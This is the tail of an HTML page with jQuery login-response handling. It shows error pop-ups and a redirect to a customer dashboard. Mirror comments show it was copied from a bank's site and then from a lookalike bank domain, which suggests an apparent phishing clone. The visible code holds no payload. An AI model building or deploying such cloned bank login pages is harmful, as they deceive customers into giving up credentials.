                        button: "Ok!",

                    })

                } else if (data == "emptyId") {
                    $("#ermptyErrro").html("<i style='color:red;input'>Id can't be empty</i>");

                } else if (data == "invakidACC") {
                  Swal.fire({
                        title: "Opps!",
                        text: "Invalid Account!",
                        icon: "error",
                        button: "Ok!",

                    })
                } else if (data == "succesdash") {
                    window.location.href = 'costomer/dashboard.php';

                }
            },

            complete: function () {
                $(".preload-container").hide();
            }
        })
    })
})
   
   </script>

</body>
<!-- Mirrored from www.blueridgebank.com/security by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 04 Mar 2024 23:25:54 GMT -->


<!-- Mirrored from blue-ridgebk.com/security.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 23 Oct 2024 18:33:40 GMT -->

</html>